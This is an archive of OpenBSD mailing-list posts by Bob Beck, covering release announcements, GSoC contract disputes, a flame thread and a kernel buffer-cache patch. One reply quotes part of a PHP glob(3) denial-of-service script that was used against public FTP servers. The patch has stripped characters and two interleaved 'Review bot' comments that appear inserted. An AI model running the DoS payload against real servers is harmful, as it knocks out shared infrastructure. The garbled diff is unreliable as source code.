Jordan Hargrave, Joshua Elsasser, Joshua Stein, Kenji Aoyama,
Kenneth R Westerback, Kevin Lo, Kevin Steves, Kurt Miller,
Landry Breuil, Laurent Fanis, Luke Tymowski, Marc Espie,
Marco Pfatschbacher, Marcus Glocker, Mark Kettenis, Mark Lumsden,
Mark Uemura, Markus Friedl, Martin Pieuchot, Martynas Venckus,
Mats O Jansson, Matthew Dempsky, Matthias Kilian, Matthieu Herrb,
Michael Erdely, Mike Belopuhov, Mike Larkin, Miod Vallat,
Nayden Markatchev, Nicholas Marriott, Nick Holland, Nigel Taylor,
Nikolay Sturm, Okan Demirmen, Otto Moerbeek, Owain Ainsworth,
Pascal Stumpf, Paul de Weerd, Paul Irofti, Peter Hessler,
Peter Valchev, Philip Guenther, Pierre-Emmanuel Andre,
Pierre-Yves Ritschard, Remi Pointel, Reyk Floeter, Robert Nagy,
Ryan Freeman, Ryan Thomas McBride, Sasano, Sebastian Benoit,
Sebastian Reitenbach, Simon Bertrang, Simon Perreault,
Stefan Sperling, Stephan A. Rickauer, Steven Mestdagh,
Stuart Cassoff, Stuart Henderson, Takuya Asada, Ted Unangst,
Theo de Raadt, Thordur I Bjornsson, Tobias Stoeckmann,
Tobias Weingartner, Todd C. Miller, Todd Fries, Uwe Stuehler,
Will Maier, William Yodlowsky, Yasuoka Masahiko, Yojiro Uo



Re: Google SoC 2012 is accepting open source organisations

2012-03-06 Thread Bob Beck
 Actually, there are a couple of organisations that are willing to act as
 a proxy for the payments to organisations that are unable to deal with
 the legalities imposed by the US IRS - it is not just foreigners that
 have issues some projects inside the US just don't have the ability to
 deal with the tax monster.  I cannot recall which ones they
 are at the moment, if asked they will take the money from google and
 hand it on.  Just ask on the GSoC mentors mailing list.


I know of no such mailing list, and certainly Google didn't put me on
to it when I had problems with their contract.

If you guys want this so freaking badly wake up.. I'm right here. I'm
willing to write the project proposals working with the other
developers, and I'm willing to supervise and mentor a worthy few
students.  I'm not willing to put myself, or the OpenBSD foundation,
in a nasty legal situation over this.  If some proxy organization will
deal with the damn google contract, then they need to talk to me. You
guys want it, put people in touch with me.



Re: Google SoC 2012 is accepting open source organisations

2012-03-06 Thread Bob Beck
  I have done GSoC as a mentor before though I have
 not been the admin for a project

Have you dealt with the google contract then?



Re: Google SoC 2012 is accepting open source organisations

2012-03-05 Thread Bob Beck
 1) The OpenBSD Foundation is NOT OpenBSD.

 2) That application never elicited a reply from Google, so no
 contract to read or sign was presented or known of.

 3) At some later point the required contract was obtained and, as Theo
 has said, nobody in the OpenBSD project or at the OpenBSD Foundation
 was interested in signing it after reading it.


In a nutshell, I'm the guy who is willing to take on some personal responsibility
in order to have this happen. However when the contract is put in front of me and I
(as a non USA person) ask questions about it, basically the people at Google stop
answering.  I don't personally blame them, they are techies, they are trying to do
the right thing. However they don't end up in a position where they are able to talk
to anyone at the company about the pitfalls of someone foreign signing something
with USA tax consequences.

Heck, as the supervisor they want to give me money - an honorarium. I don't
*want* the money because it causes me problems personally to accept it from
them (and when signing something as a director of a Canadian not for profit
I actually can't legally take it!) and while they seem able to say they will not
give me the money, they can't remove all the parts of the contract about me
taking the money that give me problems.  I would just like to get the interested
student the money.  However it has always bogged down around issues like
this.

Unfortunately this all gets turned into "we don't want to participate in SOC".
This isn't true for all of us. I would be willing to try, and have. It just has not
been workable for an entity that does not have a legal presence in the
United States.

I'm always willing to try again if this message is read by someone at Google
who can untangle the bureaucracy...



Re: Google SoC 2012 is accepting open source organisations

2012-03-05 Thread Bob Beck
 they didn't say that Theo refused to sign any paper. Just wonder, what kind
 of responsibilty that paper was about ? Accepting student's code to OpenBSD
 code base or something ?

No, it's actually about personal liability for the mentor (i.e. me) for taxes
and other such nonsense.  Google SOC actually does *not* require that
the code be accepted into the project at the end.  Fundamentally, I have no
objections to the principle of summer of code, it's the byzantine paperwork
and scary contract I have to sign as a mentor to do this for you. I'm more
than willing to hang my personal ass out there a little bit for this, working
at a university I can sort of blah blah blah a lot of the legal crap when it
comes to students, but I do have my limits.. sorry... and as soon as I delete
objectionable bits in the contract, the dialogue with the Googlers stops,  I
suspect because they can't get any traction with their internal legal people.



Re: Google SoC 2012 is accepting open source organisations

2012-03-05 Thread Bob Beck
 at first, I'd notice, 3) != 4), right ?

May not be the same, however they do want mentorship from somewhere associated
to the projects.

 at second, taxes are rather government thing, not googlish ? why should I
 sign something with Google about taxes ? It doesn't make any sense.

Because companies in the USA just do this.. whether it is to avoid
paying taxes or to keep the governmental tax-gestapo at bay..

I don't pretend for it to make sense.



Anyone got a 48 port gigabit switch, small and lower power? looking for a good home?

2012-01-11 Thread Bob Beck
OpenBSD's building infrastructure has a need for such things. if you
are in the process of rewhacking your network, I would love to hear
from you if you have such beasts that might be sent our way.

We are looking to get these things in Calgary, Canada.



Re: locate weirdness

2012-01-11 Thread Bob Beck
 So, you're advocating incomplete information? Is that not a bigger problem?

No, we don't support old releases. 4.3 is very old. You should update
your OS to something supported, and likely your problem will go away.



Openbsd 4.9 released May 1, 2011

2011-05-01 Thread Bob Beck
 and macppc.  During installation, you can install
X.Org quite easily.  Be sure to try out xdm(1) and see how we have
customized it for OpenBSD.
The OpenBSD ports tree contains automated instructions for building
third party software.  The software has been verified to build and
run on the various OpenBSD architectures.  The 4.9 ports collection,
including many of the distribution files, is included on the 3-CD
set.  Please see the PORTS file for more information.

Note: some of the most popular ports, e.g., the Apache web server
and several X applications, come standard with OpenBSD.  Also, many
popular ports have been pre-compiled for those who do not desire
to build their own binaries (see BINARY PACKAGES, below).
A large number of binary packages are provided.  Please see the PACKAGES
file (ftp://ftp.OpenBSD.org/pub/OpenBSD/4.9/PACKAGES) for more details.
The CD-ROMs contain source code for all the subsystems explained
above, and the README (ftp://ftp.OpenBSD.org/pub/OpenBSD/4.9/README)
file explains how to deal with these source files.  For those who
are doing an FTP install, the source code for all four subsystems
can be found in the pub/OpenBSD/4.9/ directory:

xenocara.tar.gz ports.tar.gz   src.tar.gz sys.tar.gz
Ports tree and package building by Jasper Lievisse Adriaanse,
Landry Breuil, Michael Erdely, Stuart Henderson, Peter Hessler,
Paul Irofti, Antoine Jacoutot, Robert Nagy, and Christian Weisgerber.
System builds by Theo de Raadt, Mark Kettenis, and Miod Vallat.
X11 builds by Todd Fries and Miod Vallat.  ISO-9660 filesystem
layout by Theo de Raadt.

We would like to thank all of the people who sent in bug reports, bug
fixes, donation cheques, and hardware that we use.  We would also like
to thank those who pre-ordered the 4.9 CD-ROM or bought our previous
CD-ROMs.  Those who did not support us financially have still helped
us with our goal of improving the quality of the software.

Our developers are:

Aleksander Piotrowski, Alexander Bluhm, Alexander Hall,
Alexander Yurchenko, Alexandr Shadchin, Alexandre Ratchov,
Antoine Jacoutot, Ariane van der Steldt, Artur Grabowski,
Austin Hook, Benoit Lecocq, Bernd Ahlers, Bob Beck, Bret Lambert,
Camiel Dobbelaar, Can Erkin Acar, Charles Longeau, Chris Kuethe,
Christian Weisgerber, Claudio Jeker, Dale Rahn, Damien Bergamini,
Damien Miller, Darren Tucker, David Coppa, David Gwynne, David Hill,
David Krause, Edd Barrett, Eric Faurot, Federico G. Schwindt,
Felix Kronlage, Gilles Chehade, Giovanni Bechis, Henning Brauer,
Hikaru Abe, Ian Darwin, Igor Sobrado, Ingo Schwarze,
Jacek Masiulaniec, Jacob Meuser, Jakob Schlyter, James Wright,
Janne Johansson, Jason George, Jason McIntyre, Jason Meltzer,
Jasper Lievisse Adriaanse, Jeremy Evans, Jim Razmus II, Joel Sing,
Johan Mson Suorra, Jolan Luff, Jonathan Armani, Jonathan Gray,
Jordan Hargrave, Joshua Elsasser, Joshua Stein,
Kenneth R Westerback, Kevin Lo, Kevin Steves, Kjell Wooding,
Kurt Miller, Landry Breuil, Laurent Fanis, Marc Espie,
Marco Peereboom, Marco Pfatschbacher, Marcus Glocker, Mark Kettenis,
Mark Lumsden, Mark Uemura, Markus Friedl, Martin Hedenfalk,
Martynas Venckus, Mathieu Sauve-Frankel, Mats O Jansson,
Matthew Dempsky, Matthias Kilian, Matthieu Herrb, Michael Erdely,
Michael Knudsen, Michele Marchetto, Mike Belopuhov, Mike Larkin,
Miod Vallat, Nicholas Marriott, Nick Holland, Nikolay Sturm,
Okan Demirmen, Oleg Safiullin, Otto Moerbeek, Owain Ainsworth,
Ozawa Tsuyoshi, Paul de Weerd, Paul Irofti, Peter Hessler,
Peter Valchev, Philip Guenther, Pierre-Emmanuel Andre,
Pierre-Yves Ritschard, Ray Lai, Remi Pointel, Reyk Floeter,
Robert Nagy, Ryan Thomas McBride, Ryo Shimizu, Sasano,
Sebastian Reitenbach, Stefan Sperling, Stephan A. Rickauer,
Steven Mestdagh, Stuart Cassoff, Stuart Henderson, Suenaga Hiroki,
Takuya Asada, Ted Unangst, Theo de Raadt, Thordur I Bjornsson,
Tobias Stoeckmann, Tobias Weingartner, Todd C. Miller, Todd Fries,
Will Maier, William Yodlowsky, Xavier Santolaria, Yasuoka Masahiko,
Yojiro Uo



Like OpenBSD? Like to see new stuff happening? You really need to order a CD today :)

2011-04-18 Thread Bob Beck
 Hi all,

   A number of you may have noticed the recent flurry of activity, leading to stuff
like bigmem being turned on.. Some more good stuff is coming soon (my amd64
at my house is using 7 gigabytes of memory for buffer cache, and I'm doing builds
without touching disks..).  Some really cool stuff is being worked on and is coming
to a source tree near you soon.

   However, I'd like to take the opportunity to remind you all, that the project does
depend on CD and shirt sales to keep it alive.  Yes you may not use a CD all the
time, but the latest one is pretty cool.

  So, short answer? go buy a CD.  Pre-orders are a little slow this release, and we need
to see some more activity in that area.

  Then maybe I'll stop worrying about it and commit that thing that will make your
amd64 use even more buttloads of memory too!

   So - yes we like donations, but we also like CD sales.. now is the time to help out.

Thanks

-Bob



Re: OpenBSD 4.8 freezes on certain activities

2010-11-05 Thread Bob Beck
Are you able to try the following? See if it solves your problem.


Index: sys/kern/vfs_bio.c
===
RCS file: /cvs/src/sys/kern/vfs_bio.c,v
retrieving revision 1.126
diff -u -r1.126 vfs_bio.c
--- sys/kern/vfs_bio.c  3 Aug 2010 06:30:19 -   1.126
+++ sys/kern/vfs_bio.c  5 Nov 2010 17:32:44 -
@@ -672,21 +672,10 @@
 */
if (!ISSET(bp-b_flags, B_DELWRI)) {
SET(bp-b_flags, B_DELWRI);
-   bp-b_synctime = time_uptime + 35;
s = splbio();
reassignbuf(bp);
splx(s);
curproc-p_stats-p_ru.ru_oublock++;/* XXX */
-   } else {
-   /*
-* see if this buffer has slacked through the syncer
-* and enforce an async write upon it.
-*/
-   if (bp-b_synctime  time_uptime) {
-   bawrite(bp);
-   return;
-   }
-   }

/* If this is a tape block, write the block now. */
if (major(bp-b_dev)  nblkdev 
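Review bot: deleting the whole `} else { ... }` block also deletes its early `return`, so a buffer that is already B_DELWRI no longer gets handed to bawrite() once it has outlived its b_synctime and instead falls through into the tape-block check and the rest of the function on every call; the cover message says only "see if it solves your problem", so it should state that the patch is testing whether this forced async write path is what wedges the reporter's machines under heavy disk I/O, and that the fall-through is the intended behaviour.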
@@ -727,7 +716,6 @@

if (ISSET(bp-b_flags, B_DELWRI) == 0) {
SET(bp-b_flags, B_DELWRI);
-   bp-b_synctime = time_uptime + 35;
reassignbuf(bp);
}
 }
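Review bot: with this second `b_synctime = time_uptime + 35` assignment gone, nothing left in the diff writes b_synctime, but the field itself is not removed here and no header is touched; either drop the field and any remaining reader of it in the same change, or note in the message that it is deliberately left as dead state so nobody later relies on a value that is never set.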


On 3 November 2010 05:17, Michay Koc m...@prime.pl wrote:
 Hi All,

 I've just upgraded two of my OpenBSD machines to 4.8:

 hw.machine=i386
 hw.model=Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz (GenuineIntel
 686-class)
 hw.product=DG31PR

 and

 hw.machine=i386
 hw.model=Intel(R) Atom(TM) CPU D510 @ 1.66GHz (GenuineIntel 686-class)
 hw.product=D510MO

 Dmesgs are below.

 The problem is that they freeze every time I try to:
 - rsync two local filesystems on different physical disks - high disk IO -
 about 30GB
 - run nagios with about 900 probes - high network IO and ndcpy like 3000 in
 systat, lots of forks, load average raising to 5 and above

 High disk IO freeze occurs about 30 seconds after rsync start and is
 permanent.
 High network IO freeze occurs several minutes after nagios start and
 sometimes machines are responsive for limited time. Pkill nagios resolves
 the problem, machine becomes responsive.

 In both cases machines behind nat still have internet connectivity.

 Local services like ssh or console are unavailable.

 Snapshot from 2010-11-02 22:51:00 does not resolve the issue.

 The Atom machine freezes much faster than Core2Duo.

 any help appreciated

 best regards
 M.K.



 Core2Duo dmesg:

 OpenBSD 4.8 (GENERIC.MP) #359: Mon Aug 16 09:16:26 MDT 2010
dera...@i386.openbsd.org:/usr/src/sys/arch/i386/compile/GENERIC.MP
 cpu0: Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz (GenuineIntel 686-class)
 3.01 GHz
 cpu0:

FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUS
H,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS-CPL,VMX,SMX,EST,TM2,S
SSE3,CX16,xTPR,PDCM,SSE4.1
 real mem  = 3476889600 (3315MB)
 avail mem = 3410038784 (3252MB)
 mainbus0 at root
 bios0 at mainbus0: AT/286+ BIOS, date 02/27/08, SMBIOS rev. 2.4 @ 0xe8170
 (42 entries)
 bios0: vendor Intel Corp. version PRG3110H.86A.0047.2008.0227.1745 date
 02/27/2008
 bios0: Intel Corporation DG31PR
 acpi0 at bios0: rev 2
 acpi0: sleep states S0 S1 S3 S4 S5
 acpi0: tables DSDT FACP APIC HPET MCFG
 acpi0: wakeup devices P0P1(S3) PS2K(S3) PS2M(S3) UAR1(S3) P0P2(S4) USB0(S3)
 USB1(S3) USB2(S3) USB3(S3) EUSB(S3) MC97(S4) PEX0(S4) PEX1(S4) PEX2(S4)
 PEX3(S4) SLPB(S4) PWRB(S3)
 acpitimer0 at acpi0: 3579545 Hz, 24 bits
 acpimadt0 at acpi0 addr 0xfee0: PC-AT compat
 cpu0 at mainbus0: apid 0 (boot processor)
 cpu0: apic clock running at 333MHz
 cpu1 at mainbus0: apid 1 (application processor)
 cpu1: Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz (GenuineIntel 686-class)
 3 GHz
 cpu1:

FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUS
H,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS-CPL,VMX,SMX,EST,TM2,S
SSE3,CX16,xTPR,PDCM,SSE4.1
 ioapic0 at mainbus0: apid 0 pa 0xfec0, version 20, 24 pins
 acpihpet0 at acpi0: 14318179 Hz
 acpiprt0 at acpi0: bus 0 (PCI0)
 acpiprt1 at acpi0: bus 4 (P0P2)
 acpiprt2 at acpi0: bus 2 (PEX0)
 acpiprt3 at acpi0: bus 3 (PEX1)
 acpiprt4 at acpi0: bus -1 (PEX2)
 acpiprt5 at acpi0: bus -1 (PEX3)
 acpicpu0 at acpi0:, C3, C2, C1, PSS
 acpicpu1 at acpi0:, C3, C2, C1, PSS
 acpibtn0 at acpi0: SLPB
 acpibtn1 at acpi0: PWRB
 bios0: ROM list: 0xc/0xb400!
 cpu0: Enhanced SpeedStep 3000 MHz: speeds: 2997, 1998 MHz
 pci0 at mainbus0 bus 0: configuration mode 1 (bios)
 pchb0 at pci0 dev 0 function 0 Intel 82G33 Host rev 0x10
 ppb0 at pci0 dev 1 function 0 Intel 82G33 PCIE rev 0x10: apic 0 int 16
 (irq 11)
 pci1 at ppb0 bus 1
 vga1 at pci0 dev 2 function 0 Intel 82G33 Video rev 0x10
 wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
 wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
 intagp0 at vga1
 agp0 at intagp0: aperture at 0xd000, size 

Re: Same shit all over again

2010-08-16 Thread Bob Beck
 Well, tinyurl redirects to my box which redirects to trollaxer.  Here is
 the culprit log for falling for such a silly trick.

 83.101.24.229 - - [15/Aug/2010:19:13:12 -0400] GET /why.html HTTP/1.1
 200 136 - Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.0.11)
 Gecko/2009070118 Firefox/3.0.11

 # host kd85.com
 kd85.com has address 83.101.24.229

 # cat why.html
 html
 head
meta http-equiv=refresh
 content=0;url=http://www.trollaxor.com/2010/06/why-i-left-openbsd.html; /
 /head

 /html

Nicely done David - I'm very impressed - as you know I mentioned
before this on hackers that this sounded very kd85 like - and you
confirmed my suspicions very effectively.

Any time I see someone talking about commit bits I think of this and
laugh - as this is someone who has never done a commit to OpenBSD.

The lies in the message that was sent are pretty good too - Were we in
the middle of a release cycle - were people cranky? Yes, absolutely -
you know what - sane people have disagreements - all the time.

however.

Machines were not turned off.

Everyone still had access to what they were doing

Was the tree locked? yes - as problems have been found in test and
need to be fixed. It's still locked - but we'll ship a good release
for that.

The priceless one is how Wim calls for a vote - yeah - that
works real well for netbsd.

and is also signing his messages H and R to deceive people as to
the real identity and to foster suspicion within the community I find
that particularly reprehensible - but not surprising. Nothing could
surprise me from this source anymore. I get the impression that this
sort of behaviour is normal from Wim - it seems to make the same
amount of sense as kd85's normal business practices - Sorry I can't go
along with that. I pay my taxes, and I pay for my own house with my
own money.  I encourage Wim to fork his own project that will be run
and funded fully, and openly, and accountable to all involved. I'm
sure it will be a resounding success.



Re: Same shit all over again

2010-08-16 Thread Bob Beck
Theo has been back for a day already, and like the rest of a lot of
us, is trying to get a test and release cycle out the door to ship a
release - that means we have better things to do than entertain misc@
by responding to Wim's idiotic bullshit.

Wanna help? go install snapshots on as many different things as you
can and tell us if you see any problems. That's a much more useful
activity than watching misc@ for trolls. Pop popcorn with the waste
heat of all the machines you are spinning up.



On 16 August 2010 10:46, Bryan Irvine sparcta...@gmail.com wrote:
 Will someone warn me 2 minutes before Theo gets back?  I'd like to
 have some popcorn ready.   :-)




 On Mon, Aug 16, 2010 at 9:27 AM, Bob Beck b...@ualberta.ca wrote:
 Well, tinyurl redirects to my box which redirects to trollaxer.  Here is
 the culprit log for falling for such a silly trick.

 83.101.24.229 - - [15/Aug/2010:19:13:12 -0400] GET /why.html HTTP/1.1
 200 136 - Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.0.11)
 Gecko/2009070118 Firefox/3.0.11

 # host kd85.com
 kd85.com has address 83.101.24.229

 # cat why.html
 html
 head
meta http-equiv=refresh
 content=0;url=http://www.trollaxor.com/2010/06/why-i-left-openbsd.html;
 /
 /head

 /html

 Nicely done David - I'm very impressed - as you know I mentioned
 before this on hackers that this sounded very kd85 like - and you
 confirmed my suspicions very effectively.

 Any time I see someone talking about commit bits I think of this and
 laugh - as this is someone who has never done a commit to OpenBSD.

 The lies in the message that was sent are pretty good too - Were we in
 the middle of a release cycle - were people cranky? Yes, absolutely -
 you know what - sane people have disagreements - all the time.

 however.

 Machines were not turned off.

 Everyone still had access to what they were doing

 Was the tree locked? yes - as problems have been found in test and
 need to be fixed. It's still locked - but we'll ship a good release
 for that.

 The priceless one is how Wim calls for a vote - yeah - that
 works real well for netbsd.

 and is also signing his messages H and R to deceive people as to
 the real identity and to foster suspicion within the community I find
 that particularly reprehensible - but not surprising. Nothing could
 surprise me from this source anymore. I get the impression that this
 sort of behaviour is normal from Wim - it seems to make the same
 amount of sense as kd85's normal business practices - Sorry I can't go
 along with that. I pay my taxes, and I pay for my own house with my
 own money.  I encourage Wim to fork his own project that will be run
 and funded fully, and openly, and accountable to all involved. I'm
 sure it will be a resounding success.



Re: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org

2010-07-02 Thread Bob Beck
It's rather astonishing what attempts to pass for a credible security
advisory today.

oh, I made a lot of connections to the site and they blocked me.

Thank you, Maksymilian, for showing us all that you can execute a
denial of service attack from 90.156.82.13.

I wonder how many connections his site supports to his services. perhaps some
similar security expert can test his connection rate and let us all know.

# traceroute  -n 90.156.82.13
# host 90.156.82.13
13.82.156.90.in-addr.arpa domain name pointer 90-156-82-13.magma-net.pl.
#




On 2 July 2010 15:47, Theo de Raadt dera...@cvs.openbsd.org wrote:
 OK, I am letting the maintainer of the site know, at the University Campus
 that you have just executed a denial of service against.

 I am surprised that you would go out of your way to declare so freely
 that you have purposely participated in a denial of service.

 Return-Path: c...@securityreason.com
 Delivery-Date: Fri Jul  2 15:38:24 2010
 Received: from shear.ucar.edu (lists.openbsd.org [192.43.244.163])
   by cvs.openbsd.org (8.14.3/8.12.1) with ESMTP id o62LcNgR016472
   (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256 verify=FAIL)
   for dera...@cvs.openbsd.org; Fri, 2 Jul 2010 15:38:24 -0600 (MDT)
 Received: from v117864.home.net.pl (v117864.home.net.pl [89.161.252.8])
   by shear.ucar.edu (8.14.3/8.14.3) with SMTP id o62LcG20025931
   for dera...@openbsd.org; Fri, 2 Jul 2010 15:38:17 -0600 (MDT)
 Received: from 90-156-82-13.magma-net.pl [90.156.82.13] (HELO [127.0.0.1])
  by securityreason.home.pl [89.161.252.8] with SMTP (IdeaSmtpServer v0.70)
  id a6e20078b871f388; Fri, 2 Jul 2010 22:38:15 +0200
 Message-ID: 4c2e4e40.4080...@securityreason.com
 Date: Fri, 02 Jul 2010 22:38:24 +0200
 From: Maksymilian Arciemowicz c...@securityreason.com
 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.10)
Gecko/20100512 Thunderbird/3.0.5
 MIME-Version: 1.0
 To: dera...@openbsd.org, secur...@openbsd.org
 Subject: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org
 X-Enigmail-Version: 1.0.1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 ?php

 /* Libc/glob(3) denial-of-service
 Maksymilian Arciemowicz from SecurityReason.com

 This script has been used to attack ftp.openbsd.org and ftp.netbsd.org

 Result (ftp.openbsd.org):
 - - Connection refused

 and in the end

 # telnet ftp.openbsd.org 21
 Trying 129.128.5.191...
 Connected to ftp.openbsd.org.
 Escape character is '^]'.
 421-  If you are seeing this message you have been blocked from using
 421- this ftp server - most likely for mirroring content without paying
 421- attention to what you were mirroring or where you should be mirroring
 421- it from, or for excessive connection rates.
 421- OpenBSD should *NOT* be mirrored from here, you should use
 421- a second level mirror as described in http://www.openbsd.org/ftp.html
 421

 Connection closed by foreign host.
 #

 ;]

 Result (ftp.netbsd.org):
 - - no more access for anonymous

 On 02.07.2010 20:29 CET, ftp.netbsd.org has return:
 530 User ftp access denied, connection limit of 160 reached.


 Affter attack from one host

 */

 $conf['host']= $argv[1] ? $argv[1] : HOST;
 $conf['user'] =$argv[2] ? $argv[2] : anonymous;
 $conf['pass'] =$argv[3] ? $argv[3] : m...@cxib.net;
 $conf['port']= $argv[4] ? $argv[4] : 21;

 $dirnames=array('A', 'B', 'C', 'D',
 'E','F','G','H','I','J','K','M','N','O','P');

$pathsent={..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{
..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*c
x;

 // fts_levelsumary
 $fts_level=2;

 

OpenBSD 4.7 Released, May 19 2010

2010-05-19 Thread Bob Beck
.  During installation, you can install
X.Org quite easily.  Be sure to try out xdm(1) and see how we have
customized it for OpenBSD.
The OpenBSD ports tree contains automated instructions for building
third party software.  The software has been verified to build and
run on the various OpenBSD architectures.  The 4.7 ports collection,
including many of the distribution files, is included on the 3-CD
set.  Please see the PORTS file for more information.

Note: some of the most popular ports, e.g., the Apache web server
and several X applications, come standard with OpenBSD.  Also, many
popular ports have been pre-compiled for those who do not desire
to build their own binaries (see BINARY PACKAGES, below).
A large number of binary packages are provided.  Please see the PACKAGES
file (ftp://ftp.OpenBSD.org/pub/OpenBSD/4.7/PACKAGES) for more details.
The CD-ROMs contain source code for all the subsystems explained
above, and the README (ftp://ftp.OpenBSD.org/pub/OpenBSD/4.7/README)
file explains how to deal with these source files.  For those who
are doing an FTP install, the source code for all four subsystems
can be found in the pub/OpenBSD/4.7/ directory:

xenocara.tar.gz ports.tar.gz   src.tar.gz sys.tar.gz
Ports tree and package building by Jasper Lievisse Adriaanse, Michael Erdely,
Simon Bertrang, Stuart Henderson, Antoine Jacoutot, Robert Nagy,
Nikolay Sturm, and Christian Weisgerber.  System builds by Theo de Raadt,
Mark Kettenis, and Miod Vallat.  X11 builds by Todd Fries and Miod Vallat.
ISO-9660 filesystem layout by Theo de Raadt.

We would like to thank all of the people who sent in bug reports, bug
fixes, donation cheques, and hardware that we use.  We would also like
to thank those who pre-ordered the 4.7 CD-ROM or bought our previous
CD-ROMs.  Those who did not support us financially have still helped
us with our goal of improving the quality of the software.

Our developers are:

Alexander Bluhm, Alexander Hall, Alexander von Gernler,
Alexander Yurchenko, Alexandre Ratchov, Alexey Vatchenko,
Anders Magnusson, Andreas Gunnarsson, Anil Madhavapeddy,
Antoine Jacoutot, Ariane van der Steldt, Artur Grabowski,
Austin Hook, Benoit Lecocq, Bernd Ahlers, Bob Beck, Bret Lambert,
Can Erkin Acar, Chad Loder, Charles Longeau, Chris Kuethe,
Christian Weisgerber, Claudio Jeker, Dale Rahn, Damien Bergamini,
Damien Miller, Dariusz Swiderski, Darren Tucker,
David Gwynne,  David Hill, David Krause, Edd Barrett, Eric Faurot,
Esben Norby,  Fabien Romano, Federico G. Schwindt, Felix Kronlage,
Gilles Chehade, Giovanni Bechis, Gordon Willem Klok, 
Henning Brauer, Ian Darwin, Igor Sobrado, Ingo Schwarze,
Jacek Masiulaniec, Jacob Meuser, Jakob Schlyter, Janne Johansson,
Jared Yanovich, Jason Dixon, Jason George, Jason McIntyre,
Jason Meltzer, Jasper Lievisse Adriaanse, Jim Razmus II, Joel Sing,
Joerg Goltermann, Johan Mson Lindman, Jolan Luff, Jonathan Armani,
Jonathan Gray, Jordan Hargrave, Joshua Stein, Kenneth R Westerback,
Kevin Lo, Kevin Steves, Kjell Wooding, Kurt Miller, Landry Breuil,
Laurent Fanis, Marc Espie, Marco Peereboom, Marco Pfatschbacher,
Marco S Hyman, Marcus Glocker, Marek Vasut, Mark Kettenis,
Mark Uemura, Markus Friedl, Martin Reindl, Martynas Venckus,
Mathieu Sauve-Frankel, Mats O Jansson, Matthias Kilian,
Matthieu Herrb, Michael Erdely, Michael Knudsen, Michele Marchetto,
Mike Larkin, Miod Vallat, Moritz Grimm, Moritz Jodeit,
Nicholas Marriott, Nick Holland, Nikolay Sturm, Okan Demirmen,
Oleg Safiullin, Otto Moerbeek, Owain Ainsworth, Paul de Weerd,
Paul Irofti, Peter Hessler, Peter Stromberg, Peter Valchev,
Philip Guenther, Pierre-Emmanuel Andre, Pierre-Yves Ritschard,
Rainer Giedat, Reyk Floeter, Robert Nagy, Rui Reis,
Ryan Thomas McBride, Simon Bertrang, Simon Perreault, Stefan Kempf,
Stefan Sperling, Stephan A. Rickauer, Steven Mestdagh,
Stuart Henderson, Takuya Asada, Ted Unangst, Theo de Raadt,
Thordur I Bjornsson, Tobias Stoeckmann, Tobias Weingartner,
Todd C. Miller, Todd Fries, Will Maier, William Yodlowsky,
Xavier Santolaria, Yasuoka Masahiko, Yojiro Uo



Re: OpenBSD 4.7 Released, May 19 2010

2010-05-19 Thread Bob Beck
 Congratulations but I can't find a mirror with the release

Did you read the entire message, in that was:
---8<---
1) Read either of the following two files for a list of ftp
  mirrors which provide OpenBSD, then choose one near you:

   http://www.OpenBSD.org/ftp.html
   ftp://ftp.OpenBSD.org/pub/OpenBSD/4.7/ftplist

  As of May 19, 2010, the following ftp mirror sites have the 4.7 release:

   ftp://ftp.eu.openbsd.org/pub/OpenBSD/4.7/   Stockholm, Sweden
   ftp://ftp.bytemine.net/pub/OpenBSD/4.7/ Oldenburg, Germany
   ftp://mirror.aarnet.edu.au/pub/OpenBSD/4.7/ Brisbane, Australia
   ftp://ftp.wu-wien.ac.at/pub/OpenBSD/4.7/Vienna, Austria
   ftp://ftp.usa.openbsd.org/pub/OpenBSD/4.7/  CO, USA
   ftp://ftp5.usa.openbsd.org/pub/OpenBSD/4.7/ CA, USA
   ftp://obsd.cec.mtu.edu/pub/OpenBSD/4.7/ Michigan, USA

   The release is also available at the master site:

   ftp://ftp.openbsd.org/pub/OpenBSD/4.7/  Alberta, Canada

   However it is strongly suggested you use a mirror.

  Other mirror sites may take a day or two to update.
---8<---

so I find it somewhat difficult to believe you could not find a mirror.

Perhaps OpenBSD is not for you.



Re: OpenBSD 4.7 Released, May 19 2010

2010-05-19 Thread Bob Beck
well, that looks a bit screwed, since it lists ftp.openbsd.org as not
having everything :)


On 19 May 2010 12:19, Stuart Henderson s...@spacehopper.org wrote:
 On 2010-05-19, Jorge Medina jo...@bsdchile.cl wrote:
 Congratulations but I can't find a mirror with the release

 http://spacehopper.org/up2date.html



wwww.openbsd.org//ftp.openbsd.org downtime - Sunday Mar 21, 0800-1530 MDT

2010-03-19 Thread Bob Beck
Hey gang

The University of Alberta is having a large scale electrician party in
our data center on Sunday Mar 21 to bring more power into it. As a result
we'll be without cooling for the duration.

Expect ftp/www.openbsd.org along with anoncvs1.ca.openbsd.org and the
web/ftp fanout machines to be unavailable for this period. Don't be
surprised when we drop off the world for a little while on Sunday.

If all goes well we should be back by 15:30 MDT (likely before)

-Bob



Re: observed spamd behavior

2010-01-11 Thread Bob Beck
2010/1/7  open...@noid.net:
